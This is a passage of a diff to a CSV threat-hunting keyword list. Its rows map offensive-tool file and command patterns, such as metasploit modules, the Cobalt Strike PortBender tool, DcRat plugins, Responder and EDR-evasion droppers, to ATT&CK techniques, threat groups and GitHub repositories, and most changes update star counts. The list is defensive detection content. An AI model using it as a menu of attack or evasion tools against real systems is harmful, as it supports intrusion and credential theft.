T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" @@ -14804,15 +14970,15 @@ "*Plugins\AccessTokens\TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Plugins\AccessTokens\TokenManipulation*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Plugins\Execution\PSExec*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*plummm/CVE-2022-27666*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*pm3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*poc.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" -"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*poc.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" @@ -14824,25 +14990,27 @@ "*poc.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" -"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*POC_DLL.dll*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*POC1*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*POC2*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*poetry run bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6026","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" +"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6027","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" "*polenum *-protocols *","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*polenum -h*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*port_forward_pivot.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*port_scanner_regex.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*PortBender backdoor*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender redirect*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cna*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 